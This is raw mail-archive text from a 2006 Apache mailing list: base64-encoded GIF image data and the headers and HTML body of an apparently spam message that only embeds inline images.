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 2ZvN2Z3t2Z/dZIEAADs= ------=_NextPart_000_000D_01C6A43F.A463D9EB-- From [email protected] Mon Jul 10 15:40:51 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 44847 invoked from network); 10 Jul 2006 15:40:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 10 Jul 2006 15:40:51 -0000 Received: (qmail 60421 invoked by uid 500); 10 Jul 2006 15:40:51 -0000 Delivered-To: [email protected] Received: (qmail 60418 invoked by uid 99); 10 Jul 2006 15:40:51 -0000 Received-SPF: neutral (hermes.apache.org: local policy) Received: from [161.129.204.104] (HELO kzfua) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 10 Jul 2006 08:40:51 -0700 Received: from [161.129.204.104] (helo=rviaw.kw) by kzfua with smtp (Exim 4.43) id 1Fzy4J-0002Ly-BX; Mon, 10 Jul 2006 11:53:07 -0400 Message-ID: <[email protected]> From: "Moses Spivey" <[email protected]> To: <[email protected]> Subject: g Date: Mon, 10 Jul 2006 11:47:26 -0400 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0012_01C6A416.F178330E" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N This is a multi-part message in MIME format. ------=_NextPart_000_0012_01C6A416.F178330E Content-Type: multipart/alternative; boundary="----=_NextPart_001_0013_01C6A416.F1783325" ------=_NextPart_001_0013_01C6A416.F1783325 Content-Type: text/plain; charset="windows-1252" Content-Transfer-Encoding: quoted-printable ------=_NextPart_001_0013_01C6A416.F1783325 Content-Type: text/html; charset="windows-1252" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Dwindows-1252"> <META content=3D"MSHTML 6.00.2600.0000" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0><IMG alt=3D"" hspace=3D0=20 src=3D"cid:[email protected]" align=3Dbaseline=20 border=3D0></FONT></DIV></BODY></HTML> ------=_NextPart_001_0013_01C6A416.F1783325-- ------=_NextPart_000_0012_01C6A416.F178330E Content-Type: image/gif; name="derailment.gif" Content-Transfer-Encoding: base64 Content-ID: <[email protected]> R0lGODdhFgJ/AecAAP66vPq4uvKyt/q3uva1ubyRn0BEacKVon5rhF1WdlFPcfW0uNahqnlngs2c po91i8qapc6cp1xWdcybp5h7j6+Jmv25u9eiq2ZbeuOqsLeOnWlde5p8kKqGl4hwiGRaeINthk5N b+Gor+yutF9XdrmQnlBOcG5gfUZIbFpVdfy5u8aXpIZviERGa0FEaVNPcYFshdqkrbSMnEpKblJQ ccWXo0JFamNZeVVRckNGao50i7qQnmtffEdIbERHa7iOnraOnaaElriPnbKLm9ijq7WNnNGeqXFi f0FFak1Mb+its4Zwh0dJbOmts9+mrkpKbbGKmmpee01Lb4pyib+ToX1phIJthllTc1tUdbKLnMiY pbCKmve2uW9hfYNuhklKbdahq/u4u5t8kf26vL2SoKaDln1qg3xpg66JmXRkgE9OcJt8kFBNb+uu tMGUonpog9mjrJ5+kvCxtu6wtYdwiKCAk1hSdNCeqPGyttWhqpZ5j6mFl6uHmKyHmPS0t8uaptKf qcmZpWxffKKBlKSClfe1uZ19kWJaePi2uaGBlFZSc2FYd0xMboVuh5N3jaeElpV4jXtpgu2vtFxV dUhJbNylrmBYd92mruuvtJR4jlZRcuqts/Ozt8eYo59/k8SXo9+nr2hdetOfqZh6j3hngZB1jFlU dOCor3BifqiFloxzivS0uHVlgL6SoEVHa1NQcYlxiWVbefm3upJ3jcGVod6mroBshX9rhIxzieer su+wteassWdcetSgquKosI10i3ZmgM2cp5l7kOKpsOissuSpsHpnguWqscGls2mGpXSKp+60uuWr spqXrTx3nhZpmJmXrOayuIqSqoqRqvS3u16Co098oaecr0h6oCpwm0B4n0F4nz53nitxmzp1nv25 vCdvm+u0urmisUl7oPu5vKudr1mAokN5n1uBokZ6n2GDo5mXrfW3u0d6oH+OqIiRqU58oYGOqMKl smyHpUV5oFiAol2CpFZ/om2Hpamcrvm4vJ+ZrVB9oFF9oVyBo7ehsCwAAAAAFgJ/AQAI/gABCBxI sKDBgwgTKlzIsKHDhxAjSpxIsaLFixgzatzIsaPHjyBDihxJsqTJkyhTqlzJsqXLlzBjypxJs6bN mzhz6tzJs6fPn0CDCh1KtKjRo0iTKl3KtKnTp1CjSp1KtarVq1izat3KtavXr2DDih1LtqzZs2jT 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 